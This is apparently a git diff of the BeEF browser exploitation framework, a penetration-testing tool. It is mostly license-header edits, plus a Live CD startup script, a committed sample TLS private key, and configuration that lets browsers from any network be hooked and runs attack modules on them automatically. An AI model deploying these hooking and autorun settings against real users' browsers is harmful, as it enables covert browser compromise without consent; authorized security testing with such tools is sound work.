diff --git a/BeEFLive.sh b/BeEFLive.sh new file mode 100644 index 000000000..14fedd039 --- /dev/null +++ b/BeEFLive.sh @@ -0,0 +1,110 @@ +#!/bin/bash +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'home/beef/doc/COPYING' for copying permission +# + + +# +# This is the auto startup script for the BeEF Live CD. +# IT SHOULD ONLY BE RUN ON THE LIVE CD +# Download LiveCD here: https://github.com/beefproject/beef/downloads +# +# This script contains a few fixes to make BeEF play nicely with the way +# remastersys creates the live cd distributable as well as generating host keys +# to enable SSH etc. The script also make it easy for the user to update/start +# the BeEF server +# +clear +echo "======================================" +echo " BeEF Live CD " +echo "======================================" +echo "" +echo "Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net" +echo "Browser Exploitation Framework (BeEF) - http://beefproject.com" +echo "See the file 'home/beef/doc/COPYING' for copying permission" +echo "" + +echo "Welcome to the BeEF Live CD" +echo "" +echo "" + +# +# Check for SSH Host Keys - if they do not exist ask user if they should be +# created (remastersys has a habit of deleting them during Live CD Creation) +# +f1="/etc/ssh/ssh_host_rsa_key" +if [ -f $f1 ] +then + echo "" +else + echo -n "Would you like to enable ssh (y/N)? " + read var + + if [ $var = "y" ] ; then + sudo ssh-keygen -t rsa -f /etc/ssh/ssh_host_rsa_key -N '' + sudo ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa_key -N '' + echo "" + echo "Please provide a password for ssh user: beef" + sudo passwd beef + echo "ssh enabled" + fi +fi +echo "" + +# +# Prompt the user if they would like to update BeEF and +# other components installed (such as sqlmap and msf) +# +echo -n "Check and install updates for BeEF (y/N)? " +read var + +if [ $var = "y" ] ; then + cd /opt/beef + git stash + git pull +fi +echo "" + +echo -n "Check and install updates for msf and sqlmap (y/N)? " +read var + +if [ $var = "y" ] ; then + cd /opt/sqlmap + git stash + git pull + cd /opt/metasploit-framework + git stash + git pull +fi + + +# +# Create a shortcut in the user's home folder to BeEF, msf and sqlmap +# (if they do not yet exist) +# +f1="beef" +if [ -f $f1 ] ; then + echo "" +else + ln -s /opt/beef/ beef + ln -s /opt/metasploit-framework/ msf + ln -s /opt/sqlmap/ sqlmap +fi + +# +# Prompt the user if they would like start BeEF +# +echo -n "Start BeEF (y/N)? " +read var + +if [ $var = "y" ] ; then + echo "" + echo "Starting BeEF.."; + + cd /opt/beef + ruby beef -x +fi + + diff --git a/Gemfile b/Gemfile index cd4bb331e..06cf6daff 100644 --- a/Gemfile +++ b/Gemfile @@ -1,19 +1,9 @@ # BeEF's Gemfile # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # Gems only required on Windows, or with specific Windows issues @@ -39,6 +29,9 @@ gem "erubis" gem "dm-migrations" gem "msfrpc-client" +# notifications +gem "twitter" + if ENV['BEEF_TEST'] # for running unit tests gem "test-unit" diff --git a/INSTALL.txt b/INSTALL.txt index fcf9719c5..552ccfc6d 100644 --- a/INSTALL.txt +++ b/INSTALL.txt @@ -1,18 +1,8 @@ =============================================================================== - Copyright 2012 Wade Alcorn wade@bindshell.net - - Licensed under the Apache License, Version 2.0 (the "License"); - you may not use this file except in compliance with the License. - You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 - - Unless required by applicable law or agreed to in writing, software - distributed under the License is distributed on an "AS IS" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - See the License for the specific language governing permissions and - limitations under the License. + Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net + Browser Exploitation Framework (BeEF) - http://beefproject.com + See the file 'doc/COPYING' for copying permission =============================================================================== diff --git a/README b/README index cdca66e3c..e91bcb000 100644 --- a/README +++ b/README @@ -1,84 +1,74 @@ -=============================================================================== - - Copyright 2012 Wade Alcorn wade@bindshell.net - - Licensed under the Apache License, Version 2.0 (the "License"); - you may not use this file except in compliance with the License. - You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 - - Unless required by applicable law or agreed to in writing, software - distributed under the License is distributed on an "AS IS" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - See the License for the specific language governing permissions and - limitations under the License. - -=============================================================================== - -What is BeEF? -------------- - -BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser. - -Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context. - - -Get Involved ------------- - -You can get in touch with the BeEF team. Just check out the following: - - -Please, send us pull requests! - -Web: http://beefproject.com/ - -Mail: beef-subscribe@bindshell.net - -IRC: ircs://irc.freenode.net/beefproject - -Twitter: @beefproject - - -Requirements ------------- - -* OSX 10.5.0 or higher, Modern Linux, Windows XP or higher -* [Ruby](http://rubylang.org) 1.9.2 RVM or higher -* [SQLite](http://sqlite.org) 3.x -* The following GEMS: - - bundler - - thin - - Sinatra - - ANSI - - TERM-ANSIcolor - - dm-core - - json - - data_objects - - dm-sqlite-adapter - - parseconfig - - erubis - - dm-migrations - - msfrpc-client - - eventmachine - - win32console (Windows Only) - - -Quick Start ------------ - -__The following is for the impatient.__ - -For full installation details (including on Microsoft Windows), please refer to INSTALL.txt. - - $ bash -s stable < <(curl -s https://raw.github.com/beefproject/beef/a6a7536e736e7788e12df91756a8f132ced24970/install-beef) - - -Usage ------ - -To get started, simply execute beef and follow the instrustions: - - $ ./beef - +=============================================================================== + + Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net + Browser Exploitation Framework (BeEF) - http://beefproject.com + See the file 'doc/COPYING' for copying permission + +=============================================================================== + +What is BeEF? +------------- + +BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser. + +Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context. + + +Get Involved +------------ + +You can get in touch with the BeEF team. Just check out the following: + + +Please, send us pull requests! + +Web: http://beefproject.com/ + +Mail: beef-subscribe@bindshell.net + +IRC: ircs://irc.freenode.net/beefproject + +Twitter: @beefproject + + +Requirements +------------ + +* OSX 10.5.0 or higher, Modern Linux, Windows XP or higher +* [Ruby](http://rubylang.org) 1.9.2 RVM or higher +* [SQLite](http://sqlite.org) 3.x +* The following GEMS: + - bundler + - thin + - Sinatra + - ANSI + - TERM-ANSIcolor + - dm-core + - json + - data_objects + - dm-sqlite-adapter + - parseconfig + - erubis + - dm-migrations + - msfrpc-client + - eventmachine + - win32console (Windows Only) + + +Quick Start +----------- + +__The following is for the impatient.__ + +For full installation details (including on Microsoft Windows), please refer to INSTALL.txt. + + $ bash -s stable < <(curl -s https://raw.github.com/beefproject/beef/a6a7536e736e7788e12df91756a8f132ced24970/install-beef) + + +Usage +----- + +To get started, simply execute beef and follow the instrustions: + + $ ./beef + diff --git a/README.mkd b/README.mkd index 79df0d1af..498d190c9 100644 --- a/README.mkd +++ b/README.mkd @@ -1,84 +1,74 @@ -=============================================================================== - - Copyright 2012 Wade Alcorn wade@bindshell.net - - Licensed under the Apache License, Version 2.0 (the "License"); - you may not use this file except in compliance with the License. - You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 - - Unless required by applicable law or agreed to in writing, software - distributed under the License is distributed on an "AS IS" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - See the License for the specific language governing permissions and - limitations under the License. - -=============================================================================== - -What is BeEF? -------------- - -__BeEF__ is short for __The Browser Exploitation Framework__. It is a penetration testing tool that focuses on the web browser. - -Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context. - - -Get Involved ------------- - -You can get in touch with the BeEF team. Just check out the following: - - -__Please, send us pull requests!__ - -__Web:__ http://beefproject.com/ - -__Mail:__ beef-subscribe@bindshell.net - -__IRC:__ ircs://irc.freenode.net/beefproject - -__Twitter:__ @beefproject - - -Requirements ------------- - -* OSX 10.5.0 or higher, Modern Linux, Windows XP or higher -* [Ruby](http://rubylang.org) 1.9.2 RVM or higher -* [SQLite](http://sqlite.org) 3.x -* The following GEMS: - - bundler - - thin - - Sinatra - - ANSI - - TERM-ANSIcolor - - dm-core - - json - - data_objects - - dm-sqlite-adapter - - parseconfig - - erubis - - dm-migrations - - msfrpc-client - - eventmachine - - win32console (Windows Only) - - -Quick Start ------------ - -__The following is for the impatient.__ - -For full installation details (including on Microsoft Windows), please refer to INSTALL.txt. - - $ bash -s stable < <(curl -s https://raw.github.com/beefproject/beef/a6a7536e736e7788e12df91756a8f132ced24970/install-beef) - - -Usage ------ - -To get started, simply execute beef and follow the instructions: - - $ ./beef - +=============================================================================== + + Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net + Browser Exploitation Framework (BeEF) - http://beefproject.com + See the file 'doc/COPYING' for copying permission + +=============================================================================== + +What is BeEF? +------------- + +__BeEF__ is short for __The Browser Exploitation Framework__. It is a penetration testing tool that focuses on the web browser. + +Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context. + + +Get Involved +------------ + +You can get in touch with the BeEF team. Just check out the following: + + +__Please, send us pull requests!__ + +__Web:__ http://beefproject.com/ + +__Mail:__ beef-subscribe@bindshell.net + +__IRC:__ ircs://irc.freenode.net/beefproject + +__Twitter:__ @beefproject + + +Requirements +------------ + +* OSX 10.5.0 or higher, Modern Linux, Windows XP or higher +* [Ruby](http://rubylang.org) 1.9.2 RVM or higher +* [SQLite](http://sqlite.org) 3.x +* The following GEMS: + - bundler + - thin + - Sinatra + - ANSI + - TERM-ANSIcolor + - dm-core + - json + - data_objects + - dm-sqlite-adapter + - parseconfig + - erubis + - dm-migrations + - msfrpc-client + - eventmachine + - win32console (Windows Only) + + +Quick Start +----------- + +__The following is for the impatient.__ + +For full installation details (including on Microsoft Windows), please refer to INSTALL.txt. + + $ curl https://raw.github.com/beefproject/beef/a6a7536e/install-beef | bash -s stable + + +Usage +----- + +To get started, simply execute beef and follow the instructions: + + $ ./beef + diff --git a/Rakefile b/Rakefile index adb1a8d14..d110ed104 100644 --- a/Rakefile +++ b/Rakefile @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # task :default => ["quick"] diff --git a/VERSION b/VERSION index 509c304b2..b4a0a0eda 100644 --- a/VERSION +++ b/VERSION @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # -0.4.3.5-alpha +0.4.3.9-alpha diff --git a/beef b/beef index 6302be317..b8a1abefe 100755 --- a/beef +++ b/beef @@ -1,19 +1,9 @@ #!/usr/bin/env ruby # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # stop deprecation warning from being displayed @@ -81,7 +71,7 @@ Socket.do_not_reverse_lookup = true case config.get("beef.database.driver") when "sqlite" DataMapper.setup(:default, "sqlite3://#{$root_dir}/#{config.get("beef.database.db_file")}") - when "mysql","postgres" + when "mysql", "postgres" DataMapper.setup(:default, :adapter => config.get("beef.database.driver"), :host => config.get("beef.database.db_host"), @@ -124,12 +114,13 @@ print_info "RESTful API key: #{BeEF::Core::Crypto::api_token}" #@note Starts the WebSocket server if config.get("beef.http.websocket.enable") BeEF::Core::Websocket::Websocket.instance - print_info "Starting WebSocket server on port [#{config.get("beef.http.websocket.port").to_i}], secure [#{config.get("beef.http.websocket.secure")}], timer [#{config.get("beef.http.websocket.alive_timer")}]" + print_info "Starting WebSocket server on port [#{config.get("beef.http.websocket.port").to_i}], timer [#{config.get("beef.http.websocket.alive_timer")}]" + if config.get("beef.http.websocket.secure") + print_info "Starting WebSocketSecure server on port [#{config.get("beef.http.websocket.secure_port").to_i}], timer [#{config.get("beef.http.websocket.alive_timer")}]" + end end - - # @note Call the API method 'pre_http_start' BeEF::API::Registrar.instance.fire(BeEF::API::Server, 'pre_http_start', http_hook_server) @@ -140,7 +131,7 @@ if config.get("beef.extension.console.shell.enable") == true begin FileUtils.mkdir_p(File.expand_path(config.get("beef.extension.console.shell.historyfolder"))) BeEF::Extension::Console::Shell.new(BeEF::Extension::Console::Shell::DefaultPrompt, - BeEF::Extension::Console::Shell::DefaultPromptChar,{'config' => config, 'http_hook_server' => http_hook_server}).run + BeEF::Extension::Console::Shell::DefaultPromptChar, {'config' => config, 'http_hook_server' => http_hook_server}).run rescue Interrupt end else diff --git a/beef_cert.pem b/beef_cert.pem new file mode 100644 index 000000000..9ac7ab1ba --- /dev/null +++ b/beef_cert.pem @@ -0,0 +1,19 @@ +-----BEGIN CERTIFICATE----- +MIIDDjCCAnegAwIBAgIJAKNYRH/AaB3DMA0GCSqGSIb3DQEBBQUAMIGfMQswCQYD +VQQGEwJBVTEUMBIGA1UECAwLQm92aW5lIExhbmQxDTALBgNVBAcMBEJlRUYxDTAL +BgNVBAoMBEJlRUYxDTALBgNVBAsMBEJlRUYxJzAlBgNVBAMMHkJyb3dzZXIgRXhw +bG9pdGF0aW9uIEZyYW1ld29yazEkMCIGCSqGSIb3DQEJARYVQmVFRkBkb250d3Jp +dGVtZS5CZUVGMB4XDTEyMDgwNjEzMDUzOFoXDTEzMDgwNjEzMDUzOFowgZ8xCzAJ +BgNVBAYTAkFVMRQwEgYDVQQIDAtCb3ZpbmUgTGFuZDENMAsGA1UEBwwEQmVFRjEN +MAsGA1UECgwEQmVFRjENMAsGA1UECwwEQmVFRjEnMCUGA1UEAwweQnJvd3NlciBF +eHBsb2l0YXRpb24gRnJhbWV3b3JrMSQwIgYJKoZIhvcNAQkBFhVCZUVGQGRvbnR3 +cml0ZW1lLkJlRUYwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBALCxzu+rOTt2 +VBM5X5KL2xpDvMJ7wT0BSVgbkEF9Pd3+h3NbB/LST0n+Mwtnk4wLzmjmNiob3EdP +0l+pKgIZYT8yHMvI3pwp0hmpE3D2bALyiQTOTjF0IhUeIYa9ZhEyeN+PgA6+Hs0Z +F/0y0El2XjkPF42Dnmp9mLTSfScv1v4xAgMBAAGjUDBOMB0GA1UdDgQWBBTaXny0 +kTye7CAr0ronsg0ob63+kTAfBgNVHSMEGDAWgBTaXny0kTye7CAr0ronsg0ob63+ +kTAMBgNVHRMEBTADAQH/MA0GCSqGSIb3DQEBBQUAA4GBABTy5s/XRd6iBwxOgV6N +B+cTRgmgHciujbI+0p4TkOkHvQPhhcD3207ndWWwv+Mc2XeQcXNaOfYUDkeCs64N +JffqThykYOdagvCu1Gecw9BEKeijS9MAuNvtvP7fcUNUql+VeTFbxMBPGDhusafz +GkY0IBg9+j6XX4JwEXxCGt0a +-----END CERTIFICATE----- diff --git a/beef_key.pem b/beef_key.pem new file mode 100644 index 000000000..1c2fc0ea9 --- /dev/null +++ b/beef_key.pem @@ -0,0 +1,16 @@ +-----BEGIN PRIVATE KEY----- +MIICeAIBADANBgkqhkiG9w0BAQEFAASCAmIwggJeAgEAAoGBALCxzu+rOTt2VBM5 +X5KL2xpDvMJ7wT0BSVgbkEF9Pd3+h3NbB/LST0n+Mwtnk4wLzmjmNiob3EdP0l+p +KgIZYT8yHMvI3pwp0hmpE3D2bALyiQTOTjF0IhUeIYa9ZhEyeN+PgA6+Hs0ZF/0y +0El2XjkPF42Dnmp9mLTSfScv1v4xAgMBAAECgYAKpDrNTmedACxiGAN8hPXGKCw3 +HlLuBKTRLJ/Mgel29DxeIy5gXnAuCaQzXKKTPabJxIugj5r9pH4MCtkf1T15Aib6 +4MFdx4UegllMUo7eUiuCtSmK9s0wEtJjShujBl4qQ10ZtWUh4Vd/clS88IjM/iPI +5Ocoph5PUgFt/tX7DQJBAOkGptgdri39bRiSGaR/Si6YYpmMUFoQt+s2id8yH9QS +26o8cHZKCahSiWLNi4rSzEJIOpXnP3n+Dcq2JttDWGcCQQDCHWgWSpdnX8uqp/Qo +yp0RZJwyBFoba4bWhzoQJj+39P0+4FBaMlZyLHZ7nd4z0JiE5S3qA9xi8zjQVrrI +rTWnAkEAmpPxBZfavWNJhW0VWYue1/36GkV73+MLPhq1pruHZZUE5o6lQ7KlaWUn +AcW79WEUYjursVjvQKuI1pmyeOzZrQJBAIGQHSxbxyjBgPA8QDSF4EZ+r96Wlwoc +QBiqk6+5x+fiBrJUCG3bkWWNldu2qFxPS63QRlAfGZeWHgK5ENzm95sCQQCe81hU +WaVM9bmt0ZvfhfQXfgvf3xKNUFemd4skTMUDgNCH1OFULB/Mz16kJDdy0q0qUS88 +yBgay+U9QuoEO425 +-----END PRIVATE KEY----- diff --git a/config.yaml b/config.yaml index 41728f809..567ab7b05 100644 --- a/config.yaml +++ b/config.yaml @@ -1,35 +1,29 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # BeEF Configuration file beef: - version: '0.4.3.5-alpha' + version: '0.4.3.9-alpha' debug: false restrictions: - # subnet of browser ip addresses that can hook to the framework + # subnet of browser ip addresses that can hook to the framework permitted_hooking_subnet: "0.0.0.0/0" - # subnet of browser ip addresses that can connect to the UI + # subnet of browser ip addresses that can connect to the UI # permitted_ui_subnet: "127.0.0.1/32" permitted_ui_subnet: "0.0.0.0/0" - + http: debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace. host: "0.0.0.0" port: "3000" + # Decrease this setting up to 1000 if you want more responsiveness when sending modules and retrieving results. + # It's not advised to decrease it with tons of hooked browsers (more than 50), + # because it might impact performance. Also, enable WebSockets is generally better. + xhr_poll_timeout: 5000 # if running behind a nat set the public ip address here #public: "" #public_port: "" # port setting is experimental @@ -42,25 +36,40 @@ beef: # Prefer WebSockets over XHR-polling when possible. websocket: enable: false - secure: false # use WebSocketSecure - port: 11989 - alive_timer: 1000 # poll BeEF every second + secure: true # use WebSocketSecure work only on https domain and whit https support enabled in BeEF + port: 61985 # WS: good success rate through proxies + secure_port: 61986 # WSSecure + ws_poll_timeout: 1000 # poll BeEF every second # Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header) web_server_imitation: enable: false type: "apache" #supported: apache, iis + # Experimental HTTPS support for the hook / admin / all other Thin managed web services + https: + enable: false + # In production environments, be sure to use a valid certificate signed for the value + # used in beef.http.dns (the domain name of the server where you run BeEF) + key: "beef_key.pem" + cert: "beef_cert.pem" + database: # For information on using other databases please read the # README.databases file # supported DBs: sqlite, mysql, postgres + # NOTE: you must change the Gemfile adding a gem require line like: + # gem "dm-postgres-adapter" + # or + # gem "dm-mysql-adapter" + # if you want to switch drivers from sqlite to postgres (or mysql). + # Finally, run a 'bundle install' command and start BeEF. driver: "sqlite" # db_file is only used for sqlite db_file: "beef.db" - + # db connection information is only used for mysql/postgres db_host: "localhost" db_name: "beef" @@ -73,18 +82,29 @@ beef: user: "beef" passwd: "beef" + # Autorun modules as soon the browser is hooked. + # NOTE: only modules with target type 'working' or 'user_notify' can be run automatically. + autorun: + enable: true + # set this to FALSE if you don't want to allow auto-run execution for modules with target->user_notify + allow_user_notify: true + crypto_default_value_length: 80 # You may override default extension configuration parameters here extension: requester: - enable: true + enable: true proxy: - enable: true + enable: true metasploit: enable: false - console: - shell: - enable: false + social_engineering: + enable: true evasion: enable: false + console: + shell: + enable: false + ipec: + enable: true diff --git a/core/api.rb b/core/api.rb index 0d845d02d..162805b9f 100644 --- a/core/api.rb +++ b/core/api.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF diff --git a/core/api/extension.rb b/core/api/extension.rb index 1358e32d2..87121854c 100644 --- a/core/api/extension.rb +++ b/core/api/extension.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF diff --git a/core/api/extensions.rb b/core/api/extensions.rb index 5d5be8cb2..37833042a 100644 --- a/core/api/extensions.rb +++ b/core/api/extensions.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module API diff --git a/core/api/main/configuration.rb b/core/api/main/configuration.rb index d047068a3..119ea40c2 100644 --- a/core/api/main/configuration.rb +++ b/core/api/main/configuration.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module API diff --git a/core/api/main/migration.rb b/core/api/main/migration.rb index 947503c41..298d29148 100644 --- a/core/api/main/migration.rb +++ b/core/api/main/migration.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module API diff --git a/core/api/main/network_stack/assethandler.rb b/core/api/main/network_stack/assethandler.rb index d2dffe0dd..04d96c1c9 100644 --- a/core/api/main/network_stack/assethandler.rb +++ b/core/api/main/network_stack/assethandler.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module API diff --git a/core/api/main/server.rb b/core/api/main/server.rb index 026a1ac5c..7ff96ff24 100644 --- a/core/api/main/server.rb +++ b/core/api/main/server.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module API diff --git a/core/api/main/server/hook.rb b/core/api/main/server/hook.rb index cb34f5244..b6229c46b 100644 --- a/core/api/main/server/hook.rb +++ b/core/api/main/server/hook.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module API diff --git a/core/api/module.rb b/core/api/module.rb index 5bbfc344d..a699e915f 100644 --- a/core/api/module.rb +++ b/core/api/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is 